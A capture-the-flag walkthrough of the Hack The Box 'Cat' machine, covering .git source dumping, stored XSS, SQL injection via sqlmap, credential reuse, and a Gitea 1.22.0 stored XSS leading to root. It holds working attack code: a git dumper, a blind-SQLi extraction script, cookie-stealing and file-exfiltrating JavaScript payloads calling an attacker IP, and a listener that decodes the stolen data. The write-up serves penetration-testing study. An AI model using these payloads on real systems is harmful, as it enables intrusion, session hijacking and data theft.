Cat

Information gathering

nmap scan (the HTTP title below shows a redirect to http://cat.htb/, so add `10.10.11.53 cat.htb` to /etc/hosts before the web steps):

❯ nmap -A 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 17:19 CST
Nmap scan report for 10.10.11.53
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_ 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 141.25 ms 10.10.16.1
2 141.44 ms 10.10.11.53

Web information:

❯ whatweb 'http://cat.htb/'
http://cat.htb/ [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.53], Title[Best Cat Competition]
Directory brute force:
Target: http://cat.htb/

[17:24:16] Starting:
[17:24:30] 301 - 301B - /.git -> http://cat.htb/.git/
[17:24:30] 403 - 272B - /.git/branches/
[17:24:30] 403 - 272B - /.git/
[17:24:30] 403 - 272B - /.git/hooks/
[17:24:30] 200 - 23B - /.git/HEAD
[17:24:30] 200 - 7B - /.git/COMMIT_EDITMSG
[17:24:30] 200 - 92B - /.git/config
[17:24:30] 200 - 73B - /.git/description
[17:24:30] 200 - 2KB - /.git/index
[17:24:30] 200 - 240B - /.git/info/exclude
[17:24:30] 403 - 272B - /.git/info/
[17:24:30] 403 - 272B - /.git/logs/
[17:24:30] 200 - 150B - /.git/logs/HEAD
[17:24:30] 301 - 317B - /.git/logs/refs/heads -> http://cat.htb/.git/logs/refs/heads/
[17:24:30] 200 - 150B - /.git/logs/refs/heads/master
[17:24:30] 301 - 311B - /.git/logs/refs -> http://cat.htb/.git/logs/refs/
[17:24:30] 301 - 312B - /.git/refs/heads -> http://cat.htb/.git/refs/heads/
[17:24:30] 403 - 272B - /.git/objects/
[17:24:30] 200 - 41B - /.git/refs/heads/master
[17:24:30] 403 - 272B - /.git/refs/
[17:24:30] 301 - 311B - /.git/refs/tags -> http://cat.htb/.git/refs/tags/
[17:24:31] 403 - 272B - /.ht_wsr.txt
[17:24:31] 403 - 272B - /.htaccess.bak1
[17:24:31] 403 - 272B - /.htaccess.orig
[17:24:31] 403 - 272B - /.htaccess.sample
[17:24:31] 403 - 272B - /.htaccess.save
[17:24:31] 403 - 272B - /.htaccess_extra
[17:24:31] 403 - 272B - /.htaccess_sc
[17:24:31] 403 - 272B - /.htaccess_orig
[17:24:31] 403 - 272B - /.htaccessOLD
[17:24:31] 403 - 272B - /.htaccessBAK
[17:24:31] 403 - 272B - /.htaccessOLD2
[17:24:31] 403 - 272B - /.html
[17:24:31] 403 - 272B - /.htm
[17:24:31] 403 - 272B - /.htpasswds
[17:24:31] 403 - 272B - /.htpasswd_test
[17:24:31] 403 - 272B - /.httr-oauth
[17:24:35] 403 - 272B - /.php
[17:24:50] 302 - 1B - /admin.php -> /join.php
[17:25:22] 200 - 1B - /config.php
[17:25:29] 301 - 300B - /css -> http://cat.htb/css/
[17:25:46] 301 - 300B - /img -> http://cat.htb/img/
[17:26:04] 302 - 0B - /logout.php -> /
[17:26:38] 403 - 272B - /server-status
[17:26:38] 403 - 272B - /server-status/
[17:26:57] 301 - 304B - /uploads -> http://cat.htb/uploads/
[17:26:57] 403 - 272B - /uploads/

Task Completed

Git leak

The .git directory is clearly exposed (HEAD, refs and index all return 200). First, dump the source.

image.png
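As an added example (not the author's tooling, which the screenshot does not name), here is a minimal Python .git dumper: it reads HEAD, follows the ref to the commit, and walks the tree objects to reconstruct every file, checking each downloaded object's SHA-1 against its name. It assumes the loose objects under .git/objects/xx/ are fetchable, as the listing above suggests, and deliberately does not handle packfiles; the script name `gitdump.py` in the usage line is hypothetical.

```python
import hashlib
import re
import sys
import urllib.error
import urllib.request
import zlib
from typing import Callable, Dict, List, Optional, Tuple

# fetch(relative_path) -> response body, or None when the server answers 403/404
Fetch = Callable[[str], Optional[bytes]]


def git_sha(kind: str, data: bytes) -> str:
    """Object name: SHA-1 over "<kind> <len>\\0" + data, exactly as git names objects."""
    return hashlib.sha1(f"{kind} {len(data)}".encode() + b"\x00" + data).hexdigest()


def git_loose_bytes(kind: str, data: bytes) -> bytes:
    """On-disk loose object: zlib over the same header + data."""
    return zlib.compress(f"{kind} {len(data)}".encode() + b"\x00" + data)


def parse_object(raw: bytes) -> Tuple[str, bytes]:
    body = zlib.decompress(raw)
    header, _, data = body.partition(b"\x00")
    kind, size = header.decode().split(" ")
    if int(size) != len(data):
        raise ValueError("object size mismatch: truncated or corrupt download")
    return kind, data


def parse_tree(data: bytes) -> List[Tuple[str, str, str]]:
    """Tree entries are '<mode> <name>\\0' followed by 20 raw SHA-1 bytes."""
    entries, i = [], 0
    while i < len(data):
        nul = data.index(b"\x00", i)
        mode, name = data[i:nul].decode().split(" ", 1)
        entries.append((mode, name, data[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def commit_tree(data: bytes) -> str:
    m = re.match(rb"tree ([0-9a-f]{40})\n", data)
    if not m:
        raise ValueError("not a commit object")
    return m.group(1).decode()


def dump_repo(fetch: Fetch) -> Dict[str, bytes]:
    """HEAD -> ref -> commit -> trees -> blobs; returns {path: content}.
    Only loose objects are fetched: objects living solely in a packfile, or a ref
    only present in .git/packed-refs, raise instead of being skipped silently."""
    head = fetch(".git/HEAD")
    if head is None:
        raise RuntimeError(".git/HEAD is not exposed")
    head = head.decode().strip()
    if head.startswith("ref: "):                       # symbolic ref (the usual case)
        ref = fetch(".git/" + head[5:])
        if ref is None:
            raise RuntimeError(f"{head[5:]} is not exposed (packed-refs?)")
        commit_sha = ref.decode().strip()
    else:                                              # detached HEAD holds the SHA itself
        commit_sha = head

    def load(sha: str) -> Tuple[str, bytes]:
        raw = fetch(f".git/objects/{sha[:2]}/{sha[2:]}")
        if raw is None:
            raise RuntimeError(f"loose object {sha} missing (packed?)")
        kind, data = parse_object(raw)
        if git_sha(kind, data) != sha:                 # verify the download against its name
            raise ValueError(f"hash mismatch for {sha}")
        return kind, data

    files: Dict[str, bytes] = {}

    def walk(tree_sha: str, prefix: str) -> None:
        kind, data = load(tree_sha)
        if kind != "tree":
            raise ValueError(f"{tree_sha} is a {kind}, expected a tree")
        for mode, name, sha in parse_tree(data):
            if mode.startswith("40"):                  # 40000: subdirectory
                walk(sha, prefix + name + "/")
            elif mode != "160000":                     # 160000: submodule pointer, no blob
                files[prefix + name] = load(sha)[1]

    kind, data = load(commit_sha)
    if kind != "commit":
        raise ValueError("HEAD does not resolve to a commit")
    walk(commit_tree(data), "")
    return files


def http_fetcher(base_url: str) -> Fetch:
    """Fetch callback for a live target, e.g. http_fetcher("http://cat.htb/")."""
    def fetch(path: str) -> Optional[bytes]:
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + "/" + path, timeout=10) as r:
                return r.read()
        except urllib.error.HTTPError as e:
            if e.code in (403, 404):
                return None
            raise
    return fetch


if __name__ == "__main__":                             # usage: python3 gitdump.py http://cat.htb/
    for path, content in sorted(dump_repo(http_fetcher(sys.argv[1])).items()):
        print(f"{len(content):7d}  {path}")
```

The hash check matters on a real target: a 200 that is actually an error page or a truncated transfer would otherwise be written out as source. Once the files are recovered, `git log` on a full clone of the objects also reveals earlier commits, which this walker (HEAD only) does not visit.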

Code audit

First a quick pass with an old regex-based source scanner:

image.png

if (isset($_POST['catId']) && isset($_POST['catName'])) {
    $cat_name = $_POST['catName'];
    $catId = $_POST['catId'];
    // catName is interpolated straight into the statement: SQL injection
    $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
    $pdo->exec($sql_insert);

Every other SQL statement in the codebase uses prepared statements; this is the only one that doesn't, and cat_name is attacker-controlled.

But this page is behind an authorization check, so we first need the axel (admin) account.

SQLite database

image.png

Registration logic

image.png

Prepare an XSS payload as the username:

<script>document.location='http://10.10.16.52:9000/?c='+document.cookie;</script>

Check where the username is read back out of the database and rendered; that is where the stored XSS fires.

image.png

Only contest.php meets the conditions for exploitation.

image.png

Submit the form with any values; the page pulls the username from the database itself.

image.png

Then set the captured cookie in the browser.

image.png

Submit another cat through the same form so that the admin can see it.

image.png

Clicking Accept then hits accept_cat.php, the vulnerable sink.

image.png

SQL injection: dumping the database

Save the Accept request (with axel's cookie) to 1.data and hand it to sqlmap, restricting it to boolean- and time-based blind techniques and the SQLite backend:

sqlmap -r 1.data --technique=BT --risk 3 --level 5 --batch --dbms=sqlite

One shot, done.

image.png

image.png

Blind-dump the users table:

Table: users
[11 entries]
+---------+-------------------------------+--------------------------------------+-----------------------------------------------------------------------------------+
| user_id | email | password | username |
+---------+-------------------------------+--------------------------------------+-----------------------------------------------------------------------------------+
| 1 | axel2017@gmail.com | d1bbba3670feb9435c9841e46e60ee2f | axel |
| 2 | rosamendoza485@gmail.com | ac369922d560f17d6eeb8b2c7dec498c | rosa |
| 3 | robertcervantes2000@gmail.com | 42846631708f69c00ec0c0a8aa4a92ad | robert |
| 4 | fabiancarachure2323@gmail.com | 39e153e825c4a3d314a0dc7f7475ddbe | fabian |
| 5 | jerrysonC343@gmail.com | 781593e060f8d065cd7281c5ec5b4b86 | jerryson |
| 6 | larryP5656@gmail.com | 1b6dce240bbfbc0905a664ad199e18f8 | larry |
| 7 | royer.royer2323@gmail.com | c598f6b844a36fa7836fba0835f1f6 | royer |
| 8 | peterCC456@gmail.com | e41ccefa439fc454f7eadbf1f139ed8a | peter |
| 9 | angel234g@gmail.com | 24a8ec003ac2e1b3c5953a6f95f8f565 | angel |
| 10 | jobert2020@gmail.com | 88e4dceccd48820cf77b5cf6c08698ad | jobert |
| 11 | 1@qq.com | c4ca4238a0b923820dcc509a6f75849b (1) | <script>document.location='http://10.10.16.52:9000/?c='+document.cookie;</script> |
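The accept_cat.php sink from the code audit and the blind dump above, replayed against a constructed in-memory SQLite database (added example, not the site's code): accept_cat_vulnerable mirrors the string-interpolated INSERT, accept_cat_safe is the parameterised fix, and blind_extract recovers axel's hash one bit at a time through an error oracle, which is what sqlmap's boolean-based technique automates. Assumed: the endpoint behaves differently (normal response vs. error) when the INSERT fails, and the users / accepted_cats column names are as in the dump.

```python
import sqlite3
from typing import Callable, List, Tuple

AXEL_HASH = "d1bbba3670feb9435c9841e46e60ee2f"      # axel's hash from the dump above
# abs() of the most negative 64-bit integer makes SQLite raise "integer overflow";
# used as the "false" branch so a wrong guess fails the whole INSERT.
SQLITE_ERROR = "abs(-9223372036854775808)"


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE users(user_id INTEGER PRIMARY KEY, email TEXT, password TEXT, username TEXT);
        CREATE TABLE accepted_cats(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users(email, password, username) VALUES ('axel2017@gmail.com', '{AXEL_HASH}', 'axel');
    """)
    return conn


def accept_cat_vulnerable(conn: sqlite3.Connection, cat_name: str) -> bool:
    """What accept_cat.php does: the name is spliced into the SQL text."""
    try:
        conn.execute("INSERT INTO accepted_cats (name) VALUES ('" + cat_name + "')")
        conn.commit()
        return True                 # the real endpoint answers normally...
    except sqlite3.Error:
        return False                # ...and errors out otherwise: a one-bit oracle


def accept_cat_safe(conn: sqlite3.Connection, cat_name: str) -> None:
    """The fix: bind the value as a parameter; quotes inside it are just data."""
    conn.execute("INSERT INTO accepted_cats (name) VALUES (?)", (cat_name,))
    conn.commit()


def accepted_names(conn: sqlite3.Connection) -> List[str]:
    return [row[0] for row in conn.execute("SELECT name FROM accepted_cats ORDER BY id")]


def blind_extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Boolean-blind extraction through an INSERT that reflects nothing.

    oracle(name) submits one cat name and reports whether the insert succeeded.
    Every probe is  'x'||(SELECT CASE WHEN <cond> THEN 'x' ELSE <error> END)||''
    so the statement succeeds only when <cond> is true.
    """
    def ask(cond: str) -> bool:
        return oracle(f"x'||(SELECT CASE WHEN ({cond}) THEN 'x' ELSE {SQLITE_ERROR} END)||'")

    length = next((n for n in range(max_len + 1) if ask(f"length(({subquery})) = {n}")), None)
    if length is None:
        raise ValueError("subquery returned NULL or something longer than max_len")
    out = ""
    for i in range(1, length + 1):                  # binary search each code point: 7 probes/char
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo() -> Tuple[List[str], str]:
    conn = build_db()
    payload = "Tom'),((SELECT password FROM users WHERE username='axel')) -- "
    accept_cat_vulnerable(conn, payload)   # 1: a second row now holds axel's hash
    accept_cat_safe(conn, payload)         # 2: same string, stored verbatim as a name
    leaked = blind_extract(lambda name: accept_cat_vulnerable(conn, name),
                           "SELECT password FROM users WHERE username='axel'")
    return accepted_names(conn), leaked    # 3: hash recovered without seeing any row


if __name__ == "__main__":
    names, leaked = demo()
    print(names[:3], leaked)
```

Step 1 shows why an INSERT is not "write-only": a second VALUES row can carry any subquery. Step 3 is the situation on the box, where nothing from accepted_cats is shown back to the attacker, so the only signal is whether the statement errored; 32 hex characters cost about 260 requests, which is also why sqlmap's `--technique=B` run above finishes quickly.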

image.png

rosa's hash cracks to: rosa @ soyunaprincesarosa (username @ password)

Lateral movement to other users

rosa has no user flag, so look at the other users.

image.png

rosa@cat:~$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
axel:x:1000:1000:axel:/home/axel:/bin/bash
rosa:x:1001:1001:,,,:/home/rosa:/bin/bash
git:x:114:119:Git Version Control,,,:/home/git:/bin/bash
jobert:x:1002:1002:,,,:/home/jobert:/bin/bash

rosa@cat:~$ groups
rosa adm
rosa@cat:~$ groups axel
axel : axel
rosa@cat:~$ groups jobert
jobert : jobert mail www-data
rosa@cat:~$ id
uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)
linpeas output on the mail spools:

╔══════════╣ Mails (limit 50)
3839 4 -rw-rw---- 1 axel mail 1961 Jan 14 16:49 /var/mail/axel
3872 0 -rw-rw---- 1 jobert mail 0 Jan 14 16:54 /var/mail/jobert
29987 36 -rw------- 1 root mail 32535 Feb 17 11:59 /var/mail/root
3839 4 -rw-rw---- 1 axel mail 1961 Jan 14 16:49 /var/spool/mail/axel
3872 0 -rw-rw---- 1 jobert mail 0 Jan 14 16:54 /var/spool/mail/jobert
29987 36 -rw------- 1 root mail 32535 Feb 17 11:59 /var/spool/mail/root

image.png

This password did not crack.

Membership in the adm group is a hint to read the logs under /var/log, which adm can read.

image.png

A plaintext password turns up in the logs: axel @ aNdZwgC4tI9gnVXv_e3Q

Reading axel's mail:

axel@cat:/var/mail$ cat *
From rosa@cat.htb Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.

From rosa@cat.htb Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

image.png

In plain terms: jobert will later review your repository, so an XSS on the repository page lets you make his browser do the clicking.

Remember to email him, since that is how he learns which repository to open:

echo -e "Subject: Re: New cat services & Employee management\nHi Rosa,\n\nThanks for the info. I’ll send Jobert the details of my Gitea repository shortly.\n\nRegarding the employee management system, you can check out the repository here: http://localhost:3000/axel/hello and review the README.\n\nBest, Axel" | sendmail jobert@cat.htb

Port 3000 is a Gitea service:

http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md

image.png

Expose port 3000 to the attacking machine.

Next, tunnelling.

Tunnel setup

Target IP: 10.10.11.53

My IP: 10.10.16.52

Method 1: SSH local port forward

Run locally:

ssh -L 3000:127.0.0.1:3000 axel@cat.htb

After entering axel's password, the target's 127.0.0.1:3000 is forwarded to local port 3000.

image.png

Method 2: a tunnelling agent (the proxy/agent commands below, with a tun device named ligolo). Not needed here, since only one port is required:

./proxy -laddr 0.0.0.0:3001 -selfcert

./agent -connect 10.10.16.52:3001 -ignore-cert

sudo ip tuntap del dev ligolo mode tun
sudo ip tuntap add user no0$ mode tun ligolo
sudo ip link set ligolo up

Gitea is a Git service written in Go; I ran into it a few days ago, and this version happens to have an XSS.

Version: 1.22.0

image.png

Gitea 1.22.0 - Stored XSS - Multiple webapps Exploit

Follow along.

After logging in:

image.png

Put the XSS payload in the repository description. Gitea renders the description as HTML here, so an anchor with a javascript: href runs when jobert clicks it; the first payload pulls index.php, the second pulls the README and base64-encodes it before sending:

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.16.52:9000/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>

<a href='javascript:fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md").then(response=>response.text()).then(data=>fetch("http://10.10.16.52:9000/?d="+encodeURIComponent(btoa(unescape(encodeURIComponent(data))))));'>XSS test</a>
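The second payload base64-encodes the UTF-8 bytes (`btoa(unescape(encodeURIComponent(data)))`) before sending, so the listener on port 9000 has to undo that. Added example, not the author's listener (the page does not show one): a small Python catcher that answers the callbacks and decodes the c=, response= and d= parameters; the port and parameter names are those used by the payloads on this page.

```python
import base64
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_path: str) -> Dict[str, str]:
    """Decode the query string of a callback hit into readable values.

    ?c=<cookie> and ?response=<text> arrive URL-encoded (parse_qs undoes that);
    ?d=<...> is base64 over the UTF-8 bytes, so it is base64-decoded and then
    UTF-8-decoded. Unknown keys are passed through URL-decoded only.
    """
    params = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    decoded = {}
    for key, values in params.items():
        value = values[0]
        if key == "d":
            value += "=" * (-len(value) % 4)          # tolerate stripped padding
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        decoded[key] = value
    return decoded


class Catcher(BaseHTTPRequestHandler):
    """Minimal listener: run this file, then point the payloads at :9000."""

    def do_GET(self) -> None:
        data = decode_exfil(self.path)
        self.log_message("from %s: %s", self.client_address[0], json.dumps(data))
        self.send_response(200)                      # empty 200 so the victim page shows no error
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 9000), Catcher).serve_forever()
```

One caveat for the cookie payload, which does not URL-encode document.cookie: Python versions before 3.10 also split query strings on `;`, so a cookie header with several cookies would be broken into separate keys; the PHPSESSID-only case on this box is unaffected.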

image.png

image.png

The exfiltrated index.php contains hard-coded Basic-auth credentials:

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
$_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {

header('WWW-Authenticate: Basic realm="Employee Management"');
header('HTTP/1.0 401 Unauthorized');
exit;
}

header('Location: dashboard.php');
exit;
?>

That password is reused for root; log in with it and you are done.